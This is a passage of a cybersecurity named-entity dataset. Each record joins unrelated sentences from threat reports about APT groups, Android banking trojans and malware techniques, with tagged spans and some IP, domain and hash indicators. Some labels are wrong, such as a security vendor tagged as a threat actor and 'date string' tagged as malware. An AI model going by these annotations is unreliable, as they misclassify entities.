control ( C2 ) operators , with specific tags labeling encrypted URLs for backdoors .", "spans": {"SYSTEM: Gmail": [[16, 21]], "TOOL: RATANKBA": [[201, 209]], "TOOL: BKDR_RATANKBA.ZAEL–A": [[220, 240]], "TOOL: PowerShell script": [[283, 300]], "THREAT_ACTOR: APT33": [[412, 417]], "IP_ADDRESS: 91.235.142.76": [[420, 433]], "DOMAIN: mywinnetwork.ddns.net": [[434, 455]]}, "info": {"id": "cyberner_stix_train_000664", "source": "cyberner_stix_train"}} {"text": "pointer from its own process environment block ( PEB ) ( Note : The KernelCallbackTable points to an array of graphic functions used by Win32 kernel subsystem module win32k.sys as call-back into user-mode . As described in previous publications , the Rocket Kitten attackers make extensive use of various phishing schemes . 
Once kernel32 base is found , the shellcode will calculate the addresses of LoadLibraryA and GetProcAddress functions , and use them to resolve other necessary APIs , which include VirtualAlloc , RtlMoveMemory , and RtlZeroMemory . Further analyses of these similarities are available via Mandiant Advantage .", "spans": {"THREAT_ACTOR: Rocket Kitten": [[251, 264]], "THREAT_ACTOR: attackers": [[265, 274]], "TOOL: kernel32": [[329, 337]], "TOOL: LoadLibraryA": [[400, 412]], "TOOL: GetProcAddress": [[417, 431]], "TOOL: APIs": [[484, 488]], "TOOL: VirtualAlloc": [[505, 517]], "TOOL: RtlMoveMemory": [[520, 533]], "TOOL: RtlZeroMemory": [[540, 553]], "ORGANIZATION: Mandiant Advantage": [[613, 631]]}, "info": {"id": "cyberner_stix_train_000665", "source": "cyberner_stix_train"}} {"text": "If the original SMS app has been restored , it will send “ the app returned to its original place. ” Controlling TrickMo TrickMo ’ s operators can control the malware via two channels : Through its C & C via a plaintext HTTP protocol using JSON objects Through encrypted SMS messages There are predefined commands to change the malware ’ s configuration and make it execute certain tasks . PUTTER PANDA is a determined adversary group , conducting intelligence-gathering operations targeting the Government , Defense , Research , and Technology sectors in the United States , with specific targeting of the US Defense and European satellite and aerospace industries . 
Symantec has found evidence of Starloader files being named AdobeUpdate.exe , AcrobatUpdate.exe , and INTELUPDATE.EXE among others .", "spans": {"MALWARE: TrickMo": [[113, 120], [121, 128]], "THREAT_ACTOR: PUTTER PANDA": [[390, 402]], "THREAT_ACTOR: group": [[429, 434]], "ORGANIZATION: Government": [[496, 506]], "ORGANIZATION: Defense": [[509, 516]], "ORGANIZATION: Research": [[519, 527]], "ORGANIZATION: Technology sectors": [[534, 552]], "ORGANIZATION: US Defense": [[607, 617]], "ORGANIZATION: satellite": [[631, 640]], "ORGANIZATION: aerospace industries": [[645, 665]], "ORGANIZATION: Symantec": [[668, 676]], "FILEPATH: Starloader files": [[699, 715]], "FILEPATH: AdobeUpdate.exe": [[728, 743]], "FILEPATH: AcrobatUpdate.exe": [[746, 763]], "FILEPATH: INTELUPDATE.EXE": [[770, 785]]}, "info": {"id": "cyberner_stix_train_000666", "source": "cyberner_stix_train"}} {"text": "With the increased use of Android phones in business environments , it is important to defend against these threats by ensuring devices are kept current with the latest updates . The victims for the 2014-2015 versions are generally IT and real estate/investment companies and in both cases , a small number of computers have been infected throughout Wild Neutron . In addition , we analyzed the victims of this campaign and spotted an interesting overlap of this campaign with another APT actor known as DarkHotel . There are different installation flows for this campaign , but we will focus on the one that uses a URL shortcut .", "spans": {"SYSTEM: Android": [[26, 33]], "ORGANIZATION: IT": [[232, 234]], "ORGANIZATION: real estate/investment companies": [[239, 271]], "THREAT_ACTOR: Wild Neutron": [[350, 362]], "THREAT_ACTOR: DarkHotel": [[504, 513]]}, "info": {"id": "cyberner_stix_train_000667", "source": "cyberner_stix_train"}} {"text": "Most of the affected devices were located in the Middle East , and many of the stolen data we saw is military-related ( e.g. , images , documents ) . 
The ScarCruft APT gang has made use of a Flash zero day patched Thursday by Adobe to attack more than two dozen high-profile targets in Russia and Asia primarily . The major error made by its operators allowed us to follow the command and control server of the GRIFFON implant last year . Any Greatness affiliates do n’t need a specific set of skills .", "spans": {"VULNERABILITY: Flash zero day": [[191, 205]], "MALWARE: GRIFFON": [[411, 418]]}, "info": {"id": "cyberner_stix_train_000668", "source": "cyberner_stix_train"}} {"text": "However , successfully installing this malicious APK requires that the user has allowed the installation of such apps as controlled in the Unknown Sources settings . FireEye said it has tracked admin@338 's activity since 2013 and the group has largely targeted organizations involved in financial , economic and trade policy . Based on the code, it is unclear what initiates the Visual Basic script . On April 21 , 2022 , KillNet also stated that \" REVIL is back in the ranks . 
\"", "spans": {"ORGANIZATION: FireEye": [[166, 173]], "THREAT_ACTOR: admin@338": [[194, 203]], "THREAT_ACTOR: group": [[235, 240]], "ORGANIZATION: organizations": [[262, 275]], "ORGANIZATION: financial , economic and trade policy": [[288, 325]], "TOOL: Visual Basic": [[380, 392]]}, "info": {"id": "cyberner_stix_train_000669", "source": "cyberner_stix_train"}} {"text": "Copy the stage 5 DLL into winlogon.exe Allocate a chunk of memory in winlogon.exe process and copy the same APC routine seen previously Read and save the original pointer of the __fnDWORD internal User32 routine ( located at offset +0x10 of the KernelCallbackTable ) and replace this pointer with the address of the APC stub routine After this function pointer hijacking , when winlogon.exe makes any graphical call ( GDI ) , the malicious code can execute without using CreateRemoteThread or As the Rocket Kitten group 's behavior was well characterized in previous publications ( see the recent report from Trend Micro and ClearSky ) . MZ header , PE header , as well as each section and their header , are decrypted separately using RC4 algorithm and a hardcoded key . UNC2529 has also used weaponized Microsoft Excel documents as a first stage downloader .", "spans": {"THREAT_ACTOR: Rocket Kitten group": [[500, 519]], "ORGANIZATION: Trend Micro": [[609, 620]], "ORGANIZATION: ClearSky": [[625, 633]], "TOOL: RC4": [[736, 739]], "THREAT_ACTOR: UNC2529": [[772, 779]]}, "info": {"id": "cyberner_stix_train_000670", "source": "cyberner_stix_train"}} {"text": "Due to these changes without a new date string , we believe the date codes are used for campaign tracking rather than a Bookworm build identifier . 
If the user enables macro to open the xlsm file , it will then drop the legitimate script engine AutoHotkey along with a malicious script file .", "spans": {"MALWARE: date string": [[35, 46]], "MALWARE: date codes": [[64, 74]], "TOOL: Bookworm": [[120, 128]], "MALWARE: xlsm file": [[186, 195]], "FILEPATH: it": [[198, 200]]}, "info": {"id": "cyberner_stix_train_000671", "source": "cyberner_stix_train"}} {"text": "For this purpose , the app receives from the C & C server the isGoogleIp flag , which indicates whether the IP address of the affected device falls within the range of known IP addresses for Google servers . Finally , Kaspersky produced a summary report on Sofacy’s summertime activity . When the attacker wants to gather information on the infected system (action 5) , it retrieves the following information: Hostname IP address Computer name Username name Connected drive OS version Architecture Start menu programs Installed software .", "spans": {"ORGANIZATION: Kaspersky": [[218, 227]], "THREAT_ACTOR: Sofacy’s": [[257, 265]]}, "info": {"id": "cyberner_stix_train_000672", "source": "cyberner_stix_train"}} {"text": "FakeSpy package permissions . Its purpose remains to manipulate financial assets , such as transferring funds from bank accounts or taking over ATM infrastructures and instructing them to dispense cash at predetermined time intervals . Unit 42 researchers have been tracking an active campaign .", "spans": {"MALWARE: FakeSpy": [[0, 7]], "THREAT_ACTOR: Its": [[30, 33]], "ORGANIZATION: bank": [[115, 119]], "ORGANIZATION: Unit 42": [[236, 243]]}, "info": {"id": "cyberner_stix_train_000673", "source": "cyberner_stix_train"}} {"text": "A recent report documents a group of attackers known as \" PittyTiger \" that appears to have been active since at least 2011 ; however , they may have been operating as far back as 2008 . 
By analyzing the attack infrastructure , Group-IB identified that MoneyTaker group continuously exfiltrates internal banking documentation to learn about bank operations in preparation for future attacks .", "spans": {"THREAT_ACTOR: group": [[28, 33]], "THREAT_ACTOR: attackers": [[37, 46]], "THREAT_ACTOR: PittyTiger": [[58, 68]], "ORGANIZATION: Group-IB": [[228, 236]], "THREAT_ACTOR: MoneyTaker group": [[253, 269]], "ORGANIZATION: bank": [[341, 345]]}, "info": {"id": "cyberner_stix_train_000674", "source": "cyberner_stix_train"}} {"text": "What ’ s more , the user can not check the balance via mobile banking or change any settings there , because after receiving the command with code 40 , the Trojan prevents the banking app from running on the phone . After compromising an initial victim 's system ( patient 0 ) , the threat actors use the Baidu search engine to search for the victim 's organization name . We think the group has likely become more enterprising , and learned to take advantage of some details from their previous campaigns to maximize profit opportunities while exerting minimal effort . CrowdStrike Services recently investigated several Play ransomware intrusions where the common entry vector was suspected to be the Microsoft Exchange ProxyNotShell vulnerabilities CVE-2022 - 41040 and CVE-2022 - 41082 .", "spans": {"TOOL: Baidu search engine": [[305, 324]], "THREAT_ACTOR: CrowdStrike Services": [[571, 591]], "TOOL: Microsoft Exchange": [[703, 721]], "VULNERABILITY: ProxyNotShell vulnerabilities": [[722, 751]], "VULNERABILITY: CVE-2022 - 41040": [[752, 768]], "VULNERABILITY: CVE-2022 - 41082": [[773, 789]]}, "info": {"id": "cyberner_stix_train_000675", "source": "cyberner_stix_train"}} {"text": "The majority of the code for TINYTYPHON is taken from the MyDoom worm and has been repurposed to find and exfiltrate documents . 
Chafer , uses Backdoor.Remexi.B .", "spans": {"TOOL: MyDoom worm": [[58, 69]], "MALWARE: Backdoor.Remexi.B": [[143, 160]]}, "info": {"id": "cyberner_stix_train_000676", "source": "cyberner_stix_train"}} {"text": "While the motivation for each APT32 private sector compromise varied – and in some cases was unknown – the unauthorized access could serve as a platform for law enforcement , intellectual property theft , or anticorruption measures that could ultimately erode the competitive advantage of targeted organizations . The attacks we attribute to Scarlet Mimic have primarily targeted Uyghur and Tibetan activists as well as those who are interested in their causes .", "spans": {"THREAT_ACTOR: APT32": [[30, 35]], "ORGANIZATION: law enforcement": [[157, 172]], "THREAT_ACTOR: Scarlet Mimic": [[342, 355]], "ORGANIZATION: Uyghur": [[380, 386]], "ORGANIZATION: Tibetan activists": [[391, 408]]}, "info": {"id": "cyberner_stix_train_000677", "source": "cyberner_stix_train"}} {"text": "It has the same functionality as the one described above but contains different text . Kaspersky Lab has detected a new method of first infection that uses a drive-by-download with a flash exploit ( CVE-2015-5119 , the one leaked from The Hacking Team incident ) . 
Kaspersky 's research notes that BlackOasis hacked into computers based in Saudi Arabia .", "spans": {"ORGANIZATION: Kaspersky Lab": [[87, 100]], "VULNERABILITY: flash exploit": [[183, 196]], "VULNERABILITY: CVE-2015-5119": [[199, 212]], "ORGANIZATION: Kaspersky": [[265, 274]], "THREAT_ACTOR: BlackOasis": [[298, 308]]}, "info": {"id": "cyberner_stix_train_000678", "source": "cyberner_stix_train"}} {"text": "A lot of additional anti-sandbox checks are performed in this exact order : Check that the malware is not executed under the root folder of a drive Check that the malware file is readable from an external source Check that the hash of base path is not 3D6D62AF1A7C8053DBC8E110A530C679 Check that the full malware path contains only human readable characters ( “ a-z ” , “ A-Z ” , and “ 0-9 ” ) Check that no node in the full path contains the MD5 string of the malware FireEye tracks thousands of threat actors , but pays special attention to state-sponsored attackers who carry out advanced persistent threat ( APT ) attacks . However , this can be easily modified by the threat actor to deliver other malicious payloads . 
Adversaries may also use CLIs to install and run new software , including malicious tools that may be installed over the course of an operation .", "spans": {"ORGANIZATION: FireEye": [[469, 476]], "THREAT_ACTOR: threat actors": [[497, 510]], "THREAT_ACTOR: attackers": [[559, 568]], "THREAT_ACTOR: APT": [[612, 615]]}, "info": {"id": "cyberner_stix_train_000679", "source": "cyberner_stix_train"}} {"text": "Package Name App Name com.whatsapp WhatsApp Messenger com.pugna.magiccall n/a org.telegram.messenger Telegram com.facebook.katana Facebook com.twitter.android Twitter jp.naver.line.android LINE : Free Calls & Messages com.instanza.cocovoice Coco com.beetalk BeeTalk com.gtomato.talkbox TalkBox Voice Messenger - PTT com.viber.voip Viber Messenger com.immomo.momo MOMO陌陌 com.facebook.orca Messenger – Text and Video Chat for Free com.skype.rover In July 2017 , APT41 initiated a TeamViewer session and transferred files that were later deleted . The origins of the Duke toolset names can be traced back to when researchers at Kaspersky Labs coined the term \" MiniDuke \" to identify the first Duke-related malware they found .", "spans": {"SYSTEM: WhatsApp": [[35, 43]], "SYSTEM: Messenger": [[44, 53], [300, 309], [337, 346], [388, 397]], "SYSTEM: Telegram": [[101, 109]], "SYSTEM: Facebook": [[130, 138]], "SYSTEM: Twitter": [[159, 166]], "SYSTEM: LINE": [[189, 193]], "SYSTEM: BeeTalk": [[258, 265]], "SYSTEM: TalkBox": [[286, 293]], "SYSTEM: Viber": [[331, 336]], "SYSTEM: MOMO陌陌": [[363, 369]], "THREAT_ACTOR: APT41": [[460, 465]], "ORGANIZATION: Kaspersky Labs": [[625, 639]], "MALWARE: MiniDuke": [[658, 666]], "MALWARE: Duke-related": [[691, 703]], "MALWARE: malware": [[704, 711]]}, "info": {"id": "cyberner_stix_train_000680", "source": "cyberner_stix_train"}} {"text": "CTU researchers recommend that clients take appropriate precautions to minimize the risk of these types of attacks :", "spans": {"ORGANIZATION: CTU": [[0, 3]]}, "info": {"id": "cyberner_stix_train_000681", 
"source": "cyberner_stix_train"}} {"text": "Magnitude EK activity then fell off the radar until Oct. 15 , 2017 , when it came back and began focusing solely on South Korea . The majority of APT37 activity continues to target South Korea , North Korean defectors , and organizations and individuals involved in Korean Peninsula reunification efforts .", "spans": {"TOOL: Magnitude EK": [[0, 12]], "ORGANIZATION: defectors": [[208, 217]]}, "info": {"id": "cyberner_stix_train_000682", "source": "cyberner_stix_train"}} {"text": "To do this , it employs a number of specific commands via DNSMessenger . Careto 's Mask campaign we discovered relies on spear-phishing e-mails with links to a malicious website .", "spans": {"TOOL: DNSMessenger": [[58, 70]], "FILEPATH: Careto": [[73, 79]]}, "info": {"id": "cyberner_stix_train_000683", "source": "cyberner_stix_train"}} {"text": "The \"Hyperlink Base\" must be extracted using another tool , strings is capable of obtaining this by looking for long strings .", "spans": {}, "info": {"id": "cyberner_stix_train_000684", "source": "cyberner_stix_train"}} {"text": "It then decrypts a hardcoded encrypted value and sets the “ action ” parameter of the Intent using the setAction API . Ke3chang attackers are operating within China . Typically, the size of the ZIP file should be less than the uncompressed content or, in some cases, ZIP files will grow larger than the original files by a reasonable number of . 
The second step is simply the same exploit used in the second step of ProxyNotShell , allowing code execution through PowerShell remoting .", "spans": {"THREAT_ACTOR: Ke3chang": [[119, 127]], "THREAT_ACTOR: attackers": [[128, 137]], "VULNERABILITY: allowing code execution through PowerShell remoting": [[432, 483]]}, "info": {"id": "cyberner_stix_train_000685", "source": "cyberner_stix_train"}} {"text": "Analysis of network traffic showed the devices were also communicating with an external command and control ( C2 ) server .", "spans": {"TOOL: command and control": [[88, 107]], "TOOL: C2": [[110, 112]]}, "info": {"id": "cyberner_stix_train_000686", "source": "cyberner_stix_train"}} {"text": "In addition to domains of that type , there is evidence of other malware distribution being carried out on this infrastructure .", "spans": {}, "info": {"id": "cyberner_stix_train_000687", "source": "cyberner_stix_train"}} {"text": "The company specializes in finance and natural resources specific to that region . The threat actors appear to be able to create and leverage multiple SWCs in parallel .", "spans": {"ORGANIZATION: finance": [[27, 34]], "MALWARE: SWCs": [[151, 155]]}, "info": {"id": "cyberner_stix_train_000688", "source": "cyberner_stix_train"}} {"text": "One peculiar thing about the actor group behind this banking malware is that they have an “ official ” twitter account that they use to post promotional content ( even videos ) about the malware . In 2018 Machete reappeared with new code and new features . 
APT38 's increasingly aggressive targeting against banks and other financial institutions has paralleled North Korea 's worsening financial condition .", "spans": {"ORGANIZATION: twitter": [[103, 110]], "THREAT_ACTOR: Machete": [[205, 212]], "THREAT_ACTOR: APT38": [[257, 262]], "ORGANIZATION: banks": [[308, 313]], "ORGANIZATION: financial institutions": [[324, 346]]}, "info": {"id": "cyberner_stix_train_000689", "source": "cyberner_stix_train"}} {"text": "The wide range of capabilities does n't limit this trojan to a specific malicious activity like a banking trojan or a ransomware . However , CTU researchers cannot dismiss the possibility that the LYCEUM could seek access to OT environments after establishing robust access to the IT environment . Although the APT38 's primary targets appear to be Financial Exchange banks and other financial organizations , they have also Financial Exchange targeted countries ' media organizations with a focus on the financial sector .", "spans": {"ORGANIZATION: CTU": [[141, 144]], "THREAT_ACTOR: LYCEUM": [[197, 203]], "THREAT_ACTOR: APT38": [[311, 316]], "ORGANIZATION: Financial Exchange banks": [[349, 373]], "ORGANIZATION: financial organizations": [[384, 407]], "ORGANIZATION: media organizations": [[465, 484]], "ORGANIZATION: financial sector": [[505, 521]]}, "info": {"id": "cyberner_stix_train_000690", "source": "cyberner_stix_train"}} {"text": "After gaining access to a victim 's computer , PLATINUM installs its own custom-built malware to communicate with the compromised system , issue commands , and move laterally through the network . 
A report published by Kaspersky Labs in 2011 on NetTraveler also mentions the C2 servers were being hosted by Krypt Technolgies .", "spans": {"THREAT_ACTOR: PLATINUM": [[47, 55]], "TOOL: custom-built malware": [[73, 93]], "ORGANIZATION: Kaspersky Labs": [[219, 233]], "MALWARE: NetTraveler": [[245, 256]], "TOOL: C2": [[275, 277]]}, "info": {"id": "cyberner_stix_train_000691", "source": "cyberner_stix_train"}} {"text": "In total , the attackers maintained a presence on the target 's network for four months between May and September 2015 . Examples as early as 2008 document malware operations against Tibetan non-governmental organizations ( NGOs ) that also targeted Falun Gong and Uyghur groups .", "spans": {"THREAT_ACTOR: attackers": [[15, 24]], "FILEPATH: document malware": [[147, 163]], "ORGANIZATION: Tibetan non-governmental organizations": [[183, 221]], "ORGANIZATION: NGOs": [[224, 228]], "ORGANIZATION: Falun Gong": [[250, 260]], "ORGANIZATION: Uyghur groups": [[265, 278]]}, "info": {"id": "cyberner_stix_train_000692", "source": "cyberner_stix_train"}} {"text": "I focused my hunting on the PowerShell activity with Palo Alto Networks AutoFocus to determine whether it ’s worth digging into further based on “ uniqueness ” and functionality .", "spans": {"TOOL: PowerShell": [[28, 38]]}, "info": {"id": "cyberner_stix_train_000693", "source": "cyberner_stix_train"}} {"text": "Aside from the inescapable irony of disguising a security-reducing Trojan as an ostensibly security-enhancing app , and the righteous affront to the whole concept of a VPN ’ s purpose a Trojan so disguised inspires , this represents an escalation in the variety of app types targeted by this campaign of bankbots in disguise . APT37 distributed SLOWDRIFT malware using a lure referencing the Korea Global Forum against academic and strategic institutions located in South Korea . 
One of the malware threads checks in an infinite loop if the mouse button was pressed and then also increments the integer iterator . This article is based on research by Marcelo Rivero , Malwarebytes ' ransomware specialist , who monitors information published by ransomware gangs on their Dark Web sites .", "spans": {"THREAT_ACTOR: APT37": [[327, 332]], "TOOL: SLOWDRIFT malware": [[345, 362]], "ORGANIZATION: academic": [[419, 427]], "ORGANIZATION: strategic institutions": [[432, 454]], "ORGANIZATION: Marcelo Rivero": [[651, 665]], "ORGANIZATION: Malwarebytes ' ransomware specialist": [[668, 704]], "THREAT_ACTOR: ransomware gangs": [[745, 761]], "ORGANIZATION: Dark Web sites": [[771, 785]]}, "info": {"id": "cyberner_stix_train_000695", "source": "cyberner_stix_train"}} {"text": "Urgent_Information_Report.exe :", "spans": {"FILEPATH: Urgent_Information_Report.exe": [[0, 29]]}, "info": {"id": "cyberner_stix_train_000696", "source": "cyberner_stix_train"}} {"text": "EventBot targets users of over 200 different financial applications , including banking , money transfer services , and crypto-currency wallets . If a bot was installed on a network that was of interest to the hacking group , this bot was then used to upload one of the remote access programs . Analysis of the operational times of the group 's activities indicates that it is probably centered around China Standard TIME ( UTC +8 ) .", "spans": {"MALWARE: EventBot": [[0, 8]], "MALWARE: bot": [[151, 154]]}, "info": {"id": "cyberner_stix_train_000697", "source": "cyberner_stix_train"}} {"text": "Though there is no functionality to collect this information in the ransomware itself , the ransomware is deployed by INDRIK SPIDER in parallel with Dridex malware , and the Dridex malware contains modules that may be used to collect information from infected hosts . 
ScarCruft is a relatively new APT group ; victims have been observed in several countries , including Russia , Nepal , South Korea , China , India , Kuwait and Romania .", "spans": {"TOOL: Dridex malware": [[149, 163], [174, 188]], "THREAT_ACTOR: ScarCruft": [[268, 277]]}, "info": {"id": "cyberner_stix_train_000698", "source": "cyberner_stix_train"}} {"text": "Mobile malware is a significant risk for organizations and consumers alike , and must be considered when protecting personal and business data . This technique hides the true C2 server from researchers that do not have access to both the rastls.dll and Sycmentec.config files . Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 .", "spans": {"MALWARE: rastls.dll": [[238, 248]], "MALWARE: Sycmentec.config files": [[253, 275]], "FILEPATH: malicious Word documents": [[299, 323]], "VULNERABILITY: exploit": [[340, 347]], "SYSTEM: Windows": [[352, 359]], "TOOL: OLE Automation Array Remote Code Execution": [[360, 402]], "VULNERABILITY: Vulnerability": [[403, 416]], "VULNERABILITY: CVE-2014-6332": [[428, 441]]}, "info": {"id": "cyberner_stix_train_000699", "source": "cyberner_stix_train"}} {"text": "Readers should carefully think through the risks before changing this default setting . We concluded that Lazarus Group was responsible for WannaCry , a destructive malware . APT33 : 64.251.19.216 [REDACTED].redirectme.net . 
Cisco Secure Email ( formerly Cisco Email Security ) can block malicious emails sent by threat actors as part of their campaign .", "spans": {"THREAT_ACTOR: Lazarus Group": [[106, 119]], "TOOL: WannaCry": [[140, 148]], "THREAT_ACTOR: APT33": [[175, 180]], "IP_ADDRESS: 64.251.19.216": [[183, 196]], "DOMAIN: [REDACTED].redirectme.net": [[197, 222]], "SYSTEM: Cisco Secure Email": [[225, 243]], "SYSTEM: Cisco Email Security": [[255, 275]]}, "info": {"id": "cyberner_stix_train_000700", "source": "cyberner_stix_train"}} {"text": "FrozenCell : Multi-Platform Surveillance Campaign Against Palestinians October 5 , 2017 FrozenCell has been seen masquerading as various well known social media and chat applications as well as an app likely only used by Palestinian or Jordanian students sitting their 2016 general exams . The malware has started targeting corporate , SMB , investment banking and consumer accounts at banks , including some in Portugal and the U.S. , in addition to Poland , according to researchers at IBM 's X-Force team . WEBC2 backdoors are probably the most well-known kind of APT1 backdoor , and are the reason why some security companies refer to APT1 as the “ Comment Crew. ” A WEBC2 backdoor is designed to retrieve a webpage from a C2 server . 
So far , there 's no evidence that customers of the infected game companies were targeted , although in at least one case , malicious code was accidentally installed on gamers ' computers by one of the infected victim companies .", "spans": {"MALWARE: FrozenCell": [[0, 10], [88, 98]], "TOOL: SMB": [[336, 339]], "ORGANIZATION: investment banking": [[342, 360]], "ORGANIZATION: banks": [[386, 391]], "ORGANIZATION: IBM 's X-Force": [[488, 502]], "MALWARE: WEBC2 backdoors": [[510, 525]], "THREAT_ACTOR: APT1": [[567, 571], [639, 643]], "MALWARE: WEBC2 backdoor": [[671, 685]], "TOOL: C2": [[727, 729]], "ORGANIZATION: customers of the infected game companies": [[774, 814]], "MALWARE: malicious code": [[863, 877]], "ORGANIZATION: gamers ' computers": [[908, 926]], "THREAT_ACTOR: the infected victim companies": [[937, 966]]}, "info": {"id": "cyberner_stix_train_000701", "source": "cyberner_stix_train"}} {"text": "Neptun is installed on Microsoft Exchange servers and is designed to passively listen for commands from the attackers . However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers .", "spans": {"MALWARE: Neptun": [[0, 6]], "THREAT_ACTOR: attackers": [[108, 117]], "ORGANIZATION: CSIS": [[170, 174]], "MALWARE: Carbanak": [[208, 216]], "ORGANIZATION: customers": [[246, 255]]}, "info": {"id": "cyberner_stix_train_000702", "source": "cyberner_stix_train"}} {"text": "La Poste - La Poste is a public limited postal service company in France . PlugX is a modular structured malware that has many different operational plugins such as communication compression and encryption , network enumeration , files interaction , remote shell operations and more . 
Starting in February 2018 , Palo Alto Networks identified a campaign of attacks performed by members of Gorgon Group targeting governmental organizations in the United Kingdom , Spain , Russia , and the United States .", "spans": {"ORGANIZATION: La Poste": [[0, 8]], "MALWARE: PlugX": [[75, 80]], "ORGANIZATION: Palo Alto Networks": [[313, 331]], "THREAT_ACTOR: Gorgon Group": [[389, 401]], "ORGANIZATION: governmental organizations": [[412, 438]]}, "info": {"id": "cyberner_stix_train_000703", "source": "cyberner_stix_train"}} {"text": "Written in pure C language , Canhadr/Ndriver provides full access to the hard drive and operating memory despite device security restrictions , and carries out integrity control of various system components to avoid debugging and security detection . Our research indicates that it has started targeting Japanese users .", "spans": {"MALWARE: Canhadr/Ndriver": [[29, 44]], "ORGANIZATION: Japanese users": [[304, 318]]}, "info": {"id": "cyberner_stix_train_000704", "source": "cyberner_stix_train"}} {"text": "Error when trying to debug the malware using the Android Studio IDE . Its targets include the military organizations and governments of countries with national interests in the South China Sea , including some within the U.S. defense industrial base . In principle , the distribution of victims should match the distribution of ASUS users around the world . 
The UK has already sanctioned the GRU after their appalling actions in Salisbury , and has frozen more than £ 940 billion worth of bank assets and £ 117 billion in personal net worth from oligarchs and their family members who fund Putin ’s war machine .", "spans": {"SYSTEM: Android Studio IDE": [[49, 67]], "ORGANIZATION: military organizations": [[94, 116]], "ORGANIZATION: governments": [[121, 132]], "ORGANIZATION: defense industrial base": [[226, 249]], "THREAT_ACTOR: GRU": [[392, 395]]}, "info": {"id": "cyberner_stix_train_000705", "source": "cyberner_stix_train"}} {"text": "Corporations can protect themselves from these side-channel attacks by deploying client-based two-factor authentication , such as Duo Security . PwC UK and BAE Systems assess it is highly likely that APT10 is a China-based threat actor with a focus on espionage and wide ranging information collection . OceanLotus : 9112f23e15fdcf14a58afa424d527f124a4170f57bd7411c82a8cdc716f6e934 Loader #2 . Some researchers believe that it is linked to TA570 because of the similarity of delivering method between it and trojan .", "spans": {"SYSTEM: Duo Security": [[130, 142]], "ORGANIZATION: PwC UK": [[145, 151]], "ORGANIZATION: BAE Systems": [[156, 167]], "THREAT_ACTOR: APT10": [[200, 205]], "THREAT_ACTOR: threat actor": [[223, 235]], "THREAT_ACTOR: espionage": [[252, 261]], "THREAT_ACTOR: OceanLotus": [[304, 314]], "FILEPATH: 9112f23e15fdcf14a58afa424d527f124a4170f57bd7411c82a8cdc716f6e934": [[317, 381]], "ORGANIZATION: researchers": [[399, 410]], "THREAT_ACTOR: TA570": [[440, 445]]}, "info": {"id": "cyberner_stix_train_000706", "source": "cyberner_stix_train"}} {"text": "The zombie host initiates the scan — another routine from previous campaigns — but updated with a larger set of parameters and programmed to run in the background .", "spans": {}, "info": {"id": "cyberner_stix_train_000707", "source": "cyberner_stix_train"}} {"text": "Icons of the apps that Bouncing Golf ’ s operators repackaged ( top ) 
and a comparison of packages between the original legitimate app ( bottom left ) and GolfSpy ( bottom right ) Figure 3 . After publishing our initial series of blogposts back in 2016 , we have continued to track the ScarCruft threat actor . Interestingly , following some open-source publications about them , the FIN7 operators seems to have developed a homemade builder of malicious Office document using ideas from ThreadKit , which they employed during the summer of 2018 . Think of cloud storage solutions like Dropbox or Plex , for example .", "spans": {"MALWARE: Bouncing Golf": [[23, 36]], "MALWARE: GolfSpy": [[155, 162]], "THREAT_ACTOR: FIN7": [[384, 388]], "TOOL: Office": [[455, 461]], "MALWARE: ThreadKit": [[488, 497]], "TOOL: Dropbox": [[586, 593]], "TOOL: Plex": [[597, 601]]}, "info": {"id": "cyberner_stix_train_000708", "source": "cyberner_stix_train"}} {"text": "A second attack that targeted the host 154.46.32.129 started on March 14 , 2017 at 14:44:42 GMT . BRONZE BUTLER has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks .", "spans": {"THREAT_ACTOR: BRONZE BUTLER": [[98, 111]], "TOOL: emails": [[130, 136]], "TOOL: Flash": [[142, 147], [234, 239]], "MALWARE: Daserf": [[194, 200]], "MALWARE: malware": [[201, 208]], "VULNERABILITY: exploits": [[240, 248]]}, "info": {"id": "cyberner_stix_train_000709", "source": "cyberner_stix_train"}} {"text": "In this same time frame , APT10 also targeted a U.S. law firm and an international apparel company , likely to gather information for commercial advantage . Fresh from targeting banks in Poland , the banking Trojan has reportedly begun taking aim at banks in Germany .", "spans": {"THREAT_ACTOR: APT10": [[26, 31]], "ORGANIZATION: U.S. 
law firm": [[48, 61]], "ORGANIZATION: apparel company": [[83, 98]], "ORGANIZATION: banks": [[178, 183], [250, 255]], "ORGANIZATION: banking": [[200, 207]], "MALWARE: Trojan": [[208, 214]]}, "info": {"id": "cyberner_stix_train_000710", "source": "cyberner_stix_train"}} {"text": "In the past , we have seen other activity groups like LEAD employ a similar attacker technique named “ proxy-library ” to achieve persistence , but not with this professionalism . CTU researchers conclude that COBALT GYPSY created the persona to gain unauthorized access to targeted computer networks via social engineering . The resource containing the expected process name ( ICON/1 ) is XORed with the first byte of the legitimate C:\\Windows\\system.ini file – 0x3B ( \" ; \" ) . [ As the documentary points out , the domain AshleyMadisonSucks.com was eventually transferred to Ashley Madison , which then shrewdly used it for advertising and to help debunk theories about why its service was supposedly untrustworthy ] .", "spans": {"ORGANIZATION: CTU": [[180, 183]], "THREAT_ACTOR: COBALT GYPSY": [[210, 222]], "ORGANIZATION: social engineering": [[305, 323]], "FILEPATH: C:\\Windows\\system.ini": [[434, 455]]}, "info": {"id": "cyberner_stix_train_000711", "source": "cyberner_stix_train"}} {"text": "While investigating the OnionDuke variant being spread by the malicious Tor node , we also identified another OnionDuke variant that appeared to have successfully compromised multiple victims in the ministry of foreign affairs of an Eastern European country during the spring of 2014 .", "spans": {"MALWARE: OnionDuke": [[24, 33], [110, 119]], "TOOL: Tor": [[72, 75]]}, "info": {"id": "cyberner_stix_train_000712", "source": "cyberner_stix_train"}} {"text": "State Machines Since various carriers implement the billing process differently , Bread has developed several variants containing generalized state machines implementing all possible steps . 
